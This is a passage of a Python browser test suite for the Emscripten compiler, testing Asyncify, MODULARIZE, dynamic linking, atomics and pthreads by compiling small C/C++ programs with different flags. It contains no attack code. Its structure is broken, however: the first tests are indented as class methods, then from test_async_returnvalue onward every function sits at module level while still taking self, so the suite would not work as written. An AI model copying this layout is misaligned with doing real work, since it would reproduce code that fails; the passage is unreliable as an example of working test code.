    self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-sASYNCIFY'])

  def test_async_virtual(self):
    # Asyncify across virtual calls, unoptimized and -O3.
    for opts in [0, 3]:
      print(opts)
      self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-sASYNCIFY'])

  def test_async_virtual_2(self):
    for opts in [0, 3]:
      print(opts)
      self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-sASSERTIONS', '-sSAFE_HEAP', '-profiling', '-sASYNCIFY'])

  # Test async sleeps in the presence of invoke_* calls, which can happen with
  # longjmp or exceptions.
  @parameterized({
    'O0': ([],), # noqa
    'O3': (['-O3'],), # noqa
  })
  def test_async_longjmp(self, args):
    self.btest_exit('browser/async_longjmp.cpp', args=args + ['-sASYNCIFY'])

  def test_async_mainloop(self):
    for opts in [0, 3]:
      print(opts)
      self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-sASYNCIFY'])

  @requires_sound_hardware
  def test_sdl_audio_beep_sleep(self):
    self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-sASSERTIONS', '-sDISABLE_EXCEPTION_CATCHING=0', '-profiling', '-sSAFE_HEAP', '-lSDL', '-sASYNCIFY'], timeout=90)

  def test_mainloop_reschedule(self):
    self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-sASYNCIFY'])

  def test_mainloop_infloop(self):
    self.btest('mainloop_infloop.cpp', '1', args=['-sASYNCIFY'])

  def test_async_iostream(self):
    self.btest('browser/async_iostream.cpp', '1', args=['-sASYNCIFY'])

  # Test an async return value. The value goes through a custom JS library
  # method that uses asyncify, and therefore it needs to be declared in
  # ASYNCIFY_IMPORTS.
  # To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
  'normal': (['-sASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa
  'response': (['-sASYNCIFY_IMPORTS=@filey.txt'],), # noqa
  'nothing': (['-DBAD'],), # noqa
  'empty_list': (['-DBAD', '-sASYNCIFY_IMPORTS=[]'],), # noqa
  'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
  # The '@' form reads the import list from a response file; create it on demand.
  if '@' in str(args):
    create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n')
  self.btest('browser/async_returnvalue.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-sASSERTIONS'])

# Overflowing the (tiny) asyncify stack must abort with a runtime error.
def test_async_stack_overflow(self):
  self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-sASYNCIFY', '-sASYNCIFY_STACK_SIZE=4'])

# An ASYNCIFY_ONLY list naming a nonexistent function must not break the build.
def test_async_bad_list(self):
  self.btest('browser/async_bad_list.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_ONLY=[waka]', '--profiling'])

# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sMODULARIZE as well.
def test_minimal_runtime_modularize(self):
  self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sMODULARIZE', '-sMINIMAL_RUNTIME'])
  self.run_browser('test.html', None, '/report_result?0')

# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sEXPORT_NAME=Foo as well.
def test_minimal_runtime_export_name(self):
  self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sEXPORT_NAME=Foo', '-sMINIMAL_RUNTIME'])
  self.run_browser('test.html', None, '/report_result?0')

@requires_sync_compilation
def test_modularize(self):
  for opts in [
    [],
    ['-O1'],
    ['-O2', '-profiling'],
    ['-O2'],
    ['-O2', '--closure=1']
  ]:
    for args, code in [
      # defaults
      # NOTE: the check must be `!(x instanceof Promise)` — `!` binds tighter
      # than `instanceof`, so `!promise instanceof Promise` evaluated
      # `(!promise) instanceof Promise`, which is always false and made the
      # assertion a no-op.
      ([], '''
        let promise = Module();
        if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
      '''),
      # use EXPORT_NAME
      (['-sEXPORT_NAME="HelloWorld"'], '''
        if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
        HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
        let promise = HelloWorld();
        if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
      '''),
      # pass in a Module option (which prevents main(), which we then invoke ourselves)
      (['-sEXPORT_NAME="HelloWorld"'], '''
        HelloWorld({ noInitialRun: true }).then(hello => {
          hello._main();
        });
      '''),
      # Even without a mem init file, everything is async
      (['-sEXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
        HelloWorld({ noInitialRun: true }).then(hello => {
          hello._main();
        });
      '''),
    ]:
      print('test on', opts, args, code)
      # this test is synchronous, so avoid async startup due to wasm features
      self.compile_btest([test_file('browser_test_hello_world.c'), '-sMODULARIZE', '-sSINGLE_FILE'] + args + opts)
      create_file('a.html', '''
        <script src="a.out.js"></script>
        <script>
          %s
        </script>
      ''' % code)
      self.run_browser('a.html', '...', '/report_result?0')

# A failed wasm download must reject the MODULARIZE factory promise.
def test_modularize_network_error(self):
  test_c_path = test_file('browser_test_hello_world.c')
  browser_reporting_js_path = test_file('browser_reporting.js')

  self.compile_btest([test_c_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
  create_file('a.html', '''
    <script src="a.out.js"></script>
    <script>
      createModule()
        .then(() => {
          reportResultToServer("Module creation succeeded when it should have failed");
        })
        .catch(err => {
          reportResultToServer(err.message);
        });
    </script>
  ''')
  print('Deleting a.out.wasm to cause a download error')
  os.remove('a.out.wasm')
  self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)')

# An error thrown during module init must reject the factory promise (and not
# surface as an unhandled rejection).
def test_modularize_init_error(self):
  test_cpp_path = test_file('browser/test_modularize_init_error.cpp')
  browser_reporting_js_path = test_file('browser_reporting.js')

  self.compile_btest([test_cpp_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
  create_file('a.html', '''
    <script src="a.out.js"></script>
    <script>
      if (typeof window === 'object') {
        window.addEventListener('unhandledrejection', function(event) {
          reportResultToServer("Unhandled promise rejection: " + event.reason.message);
        });
      }
      createModule()
        .then(() => {
          reportResultToServer("Module creation succeeded when it should have failed");
        })
        .catch(err => {
          reportResultToServer(err);
        });
    </script>
  ''')
  self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')

# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
  self.set_setting('EXIT_RUNTIME')
  # TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
  self.ldflags.remove('-sCLOSURE_WARNINGS=error')
  # amount of memory different from the default one that will be allocated for the emscripten heap
  totalMemory = 33554432
  for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
    # the main function simply checks that the amount of allocated heap memory is correct
    create_file('test.c', r'''
      #include <stdio.h>
      #include <emscripten.h>
      int main() {
        EM_ASM({
          // use eval here in order for the test with closure compiler enabled to succeed
          var totalMemory = Module['INITIAL_MEMORY'];
          assert(totalMemory === %d, 'bad memory size');
        });
        return 0;
      }
    ''' % totalMemory)
    # generate a dummy file
    create_file('dummy_file', 'dummy')
    # compile the code with the modularize feature and the preload-file option enabled
    # no wasm, since this tests customizing total memory at runtime
    self.compile_btest(['test.c', '-sWASM=0', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY)
    create_file('a.html', '''
      <script src="a.out.js"></script>
      <script>
        // instantiate the Foo module with custom INITIAL_MEMORY value
        var foo = Foo({ INITIAL_MEMORY: %d });
      </script>
    ''' % totalMemory)
    self.run_browser('a.html', '...', '/report_result?exit:0')

def test_webidl(self):
  # see original in test_core.py
  self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
  self.assertExists('glue.cpp')
  self.assertExists('glue.js')
  for opts in [[], ['-O1'], ['-O2']]:
    print(opts)
    self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)

@requires_sync_compilation
def test_dynamic_link(self):
  create_file('main.c', r'''
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <emscripten.h>
    char *side(const char *data);
    int main() {
      char *temp = side("hello through side\n");
      char *ret = (char*)malloc(strlen(temp)+1);
      strcpy(ret, temp);
      temp[1] = 'x';
      EM_ASM({
        Module.realPrint = out;
        out = function(x) {
          if (!Module.printed) Module.printed = x;
          Module.realPrint(x);
        };
      });
      puts(ret);
      EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
      return 0;
    }
  ''')
  create_file('side.c', r'''
    #include <stdlib.h>
    #include <string.h>
    char *side(const char *data);
    char *side(const char *data) {
      char *ret = (char*)malloc(strlen(data)+1);
      strcpy(ret, data);
      return ret;
    }
  ''')
  self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
  self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', 'side.wasm'])

  print('wasm in worker (we can read binary data synchronously there)')
  self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
  self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm'])

  print('wasm (will auto-preload since no sync binary reading)')
  # same wasm side module works
  self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sEXPORT_ALL', 'side.wasm'])

# dlopen of a side module that was not preloaded, loaded asynchronously.
def test_dlopen_async(self):
  create_file('side.c', 'int foo = 42;\n')
  self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE'])
  self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-sMAIN_MODULE=2'])

def test_dlopen_blocking(self):
  create_file('side.c', 'int foo = 42;\n')
  self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE', '-sUSE_PTHREADS', '-Wno-experimental'])
  # Attempt to use dlopen the side module (without preloading) should fail on the main thread
  # since the synchronous `readBinary` function does not exist.
  self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-sMAIN_MODULE=2'])
  # But with PROXY_TO_PTHREAD it does work, since we can do blocking and sync XHR in a worker.
  self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-sMAIN_MODULE=2', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-Wno-experimental'])

# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
  '': ([0],),
  'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
  self.emcc_args += ['-O2']
  # --proxy-to-worker only on main
  if inworker:
    self.emcc_args += ['--proxy-to-worker']

  def do_run(src, expected_output, emcc_args=[]):
    # XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
    # -> do the assert about expected output inside browser.
    #
    # we have to put the hook into post.js because in main it is too late
    # (in main we won't be able to catch what static constructors inside
    # linked dynlibs printed), and in pre.js it is too early (out is not yet
    # setup by the shell).
    create_file('post.js', r'''
      Module.realPrint = out;
      out = function(x) {
        if (!Module.printed) Module.printed = "";
        Module.printed += x + '\n'; // out is passed str without last \n
        Module.realPrint(x);
      };
    ''')
    create_file('test_dylink_dso_needed.c', src + r'''
      #include <emscripten/em_asm.h>
      int main() {
        int rtn = test_main();
        EM_ASM({
          var expected = %r;
          assert(Module.printed === expected, ['stdout expected:', expected]);
        });
        return rtn;
      }
    ''' % expected_output)
    self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args)

  self._test_dylink_dso_needed(do_run)

@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
  create_file('main.c', r'''
    #include <stdio.h>
    #include <string.h>
    #include <assert.h>
    const char *side();
    int main() {
      const char *exts = side();
      puts(side());
      assert(strstr(exts, "GL_EXT_texture_env_combine"));
      return 0;
    }
  ''')
  create_file('side.c', r'''
    #include "SDL/SDL.h"
    #include "SDL/SDL_opengl.h"
    const char *side() {
      SDL_Init(SDL_INIT_VIDEO);
      SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
      return (const char *)glGetString(GL_EXTENSIONS);
    }
  ''')
  self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL'])
  self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sLEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm'])

def test_dynamic_link_many(self):
  # test asynchronously loading two side modules during startup
  create_file('main.c', r'''
    #include <assert.h>
    int side1();
    int side2();
    int main() {
      assert(side1() == 1);
      assert(side2() == 2);
      return 0;
    }
  ''')
  create_file('side1.c', r'''
    int side1() { return 1; }
  ''')
  create_file('side2.c', r'''
    int side2() { return 2; }
  ''')
  self.run_process([EMCC, 'side1.c', '-sSIDE_MODULE', '-o', 'side1.wasm'])
  self.run_process([EMCC, 'side2.c', '-sSIDE_MODULE', '-o', 'side2.wasm'])
  self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])

def test_dynamic_link_pthread_many(self):
  # Test asynchronously loading two side modules during startup
  # They should always load in the same order
  # Verify that function pointers in the browser's main thread
  # refer to the same function as in a pthread worker.

  # The main thread function table is populated asynchronously
  # in the browser's main thread. However, it should still be
  # populated in the same order as in a pthread worker to
  # guarantee function pointer interop.
  create_file('main.cpp', r'''
    #include <cassert>
    #include <thread>
    #include <emscripten/emscripten.h>
    int side1();
    int side2();
    int main() {
      auto side1_ptr = &side1;
      auto side2_ptr = &side2;
      // Don't join the thread since this is running in the
      // browser's main thread.
      std::thread([=]{
        assert(side1_ptr == &side1);
        assert(side2_ptr == &side2);
        emscripten_force_exit(0);
      }).detach();
      emscripten_exit_with_live_runtime();
    }
  ''')

  # The browser will try to load side1 first.
  # Use a big payload in side1 so that it takes longer to load than side2
  create_file('side1.cpp', r'''
    char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
    int side1() { return 1; }
  ''')
  create_file('side2.cpp', r'''
    char const * payload2 = "0";
    int side2() { return 2; }
  ''')
  self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side1.wasm'])
  self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side2.wasm'])
  self.btest_exit(self.in_dir('main.cpp'),
                  args=['-Wno-experimental', '-pthread', '-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])

# Preloading a large file must not break memory growth that happens at startup.
def test_memory_growth_during_startup(self):
  create_file('data.dat', 'X' * (30 * 1024 * 1024))
  self.btest('browser_test_hello_world.c', '0', args=['-sASSERTIONS', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=16MB', '-sTOTAL_STACK=16384', '--preload-file', 'data.dat'])

# pthreads tests

def prep_no_SAB(self):
  # Build a shell page that hides SharedArrayBuffer/Atomics, to simulate a
  # browser without threading support.
  create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body>
    <script>
      SharedArrayBuffer = undefined;
      Atomics = undefined;
    </script>
  '''))

@requires_threads
def test_pthread_c11_threads(self):
  self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
                  args=['-gsource-map', '-std=gnu11', '-xc', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sTOTAL_MEMORY=64mb'])

@requires_threads
def test_pthread_pool_size_strict(self):
  # Check that it doesn't fail with sufficient number of threads in the pool.
  self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
                  args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
  # Check that it fails instead of deadlocking on insufficient number of threads in the pool.
  self.btest(test_file('pthread/test_pthread_c11_threads.c'),
             expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
             args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=3', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])

@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
  # Check that it succeeds when the pool is large enough for a pthread to create another pthread.
  self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=2', '-sPTHREAD_POOL_SIZE_STRICT=2'])
  # Check that it fails when there's a pthread creating another pthread.
  self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=1', '-sPTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL'])

# Test that the emscripten_ atomics api functions work.
@parameterized({
  'normal': ([],),
  'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
  self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-g1'] + args)

# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
  self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Test 64-bit C++11 atomics.
@parameterized({
  '': ([],),
  'O3': (['-O3'],)
})
@requires_threads
def test_pthread_64bit_cxx11_atomics(self, opt):
  # Run both with and without pthreads enabled: C++11 atomics must work in
  # single-threaded builds too.
  for pthreads in [[], ['-sUSE_PTHREADS']]:
    self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads)

# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
  # Pool size is a JS expression evaluated at runtime, not a fixed number.
  self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])

# Blocking (join/wait) on the browser's main thread: should abort when
# ALLOW_BLOCKING_ON_MAIN_THREAD=0, warn by default, and work on a pthread.
@parameterized({
  'join': ('join',),
  'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
  print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
  self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
  if name == 'join':
    print('Test that by default we just warn about blocking on the main thread.')
    self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
    print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
    self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
    print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
    self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
    print('Test that everything works ok when we are on a pthread.')
    self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sPROXY_TO_PTHREAD', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])

# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
  self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
  # Exercise every optimization level, with and without debug info.
  for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
    for debug in [[], ['-g']]:
      args = opt + debug
      print(args)
      self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
  # 64-bit atomics are broken under wasm2js; see the linked binaryen issue.
  if not self.is_wasm():
    self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
  self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs']
  self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-O2', '-sPTHREAD_POOL_SIZE=8'])

# Tests the rest of the remaining GCC atomics after the two above tests.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomics(self):
  self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_spinlock(self):
  # Run with the generic implementation and with emscripten intrinsics.
  for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
    self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)

# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
  def test(args):
    print(args)
    self.btest_exit(test_file('pthread/test_pthread_create.cpp'),
                    args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + args,
                    extra_tries=0) # this should be 100% deterministic
  print() # new line
  test([])
  test(['-O3'])
  # TODO: re-enable minimal runtime once the flakiness is figured out,
  # https://github.com/emscripten-core/emscripten/issues/12368
  # test(['-sMINIMAL_RUNTIME'])

# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
  self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_DELAY_LOAD'])

# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
  self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-sINITIAL_MEMORY=128MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')

# Tests the -sPROXY_TO_PTHREAD option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
  self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
  # Run both plain and with MODULARIZE + a custom EXPORT_NAME shell.
  for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
    self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'] + modularize)

# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
  self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])

# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
  self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
  self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-sUSE_PTHREADS'])

# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
  self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
  self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-sUSE_PTHREADS=1', '-sPTHREAD_POOL_SIZE=8'])

# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
  self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
  self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
  # Run with the default mutex path and with the spinlock variant.
  for arg in [[], ['-DSPINLOCK_TEST']]:
    self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)

# Test pthread_attr_getstack().
@requires_threads
def test_pthread_attr_getstack(self):
  self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])

# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
  self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
  # NOTE(review): -sINITIAL_MEMORY appears twice (64MB then 256MB); the later
  # flag presumably wins — confirm and drop the redundant one.
  self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sINITIAL_MEMORY=256MB'])

# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
  self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
  self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
  self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '--closure=1', '-sENVIRONMENT=web,worker'])

# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
  # Run with the default path and with C volatile.
  for arg in [[], ['-DUSE_C_VOLATILE']]:
    self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)

# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
  self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sASSERTIONS'])

# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
  self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])

# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
  # Run with LIBRARY_DEBUG both on and off.
  def run(debug):
    self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sLIBRARY_DEBUG=%d' % debug])
  run(debug=True)
  run(debug=False)

# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
